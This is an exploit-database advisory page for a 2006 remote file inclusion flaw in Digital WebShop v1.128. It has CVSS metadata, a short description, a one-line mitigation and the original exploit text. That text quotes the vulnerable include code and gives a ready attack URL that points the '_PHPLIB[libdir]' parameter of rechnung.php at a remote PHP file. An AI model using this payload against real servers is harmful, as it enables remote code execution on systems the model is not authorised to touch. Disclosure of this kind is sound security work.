Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities

vendor:

Digital WebShop

by:

ajann

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: Digital WebShop

Affected Version From: v1.128

Affected Version To: v1.128

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the '_PHPLIB[libdir]' parameter in 'prepend.php' script. This can be exploited to execute arbitrary PHP code by including a remote file via HTTP or FTP protocol.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

# Title  :  Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities
# Author :   ajann
# Script Page : http://digitalwebshop.dyndns.org

# Exploit;
*******************************************************************************
[Files]
rechnung.php
prepend.php
[/Files]

[Code,1]
prepend.php Error:

// include Werzeuge
..
....
require_once($_PHPLIB["libdir"] . "phpDB-mysql.lib");                   /*
Mysql Class*/
require_once($_PHPLIB["libdir"] . "messages_inc.php");                  /*
Layout f?r Echos & Prints. */
....
..

Key [:] _PHPLIB[libdir]=http://target.com/command.php?

\Example:

http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?

# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-19]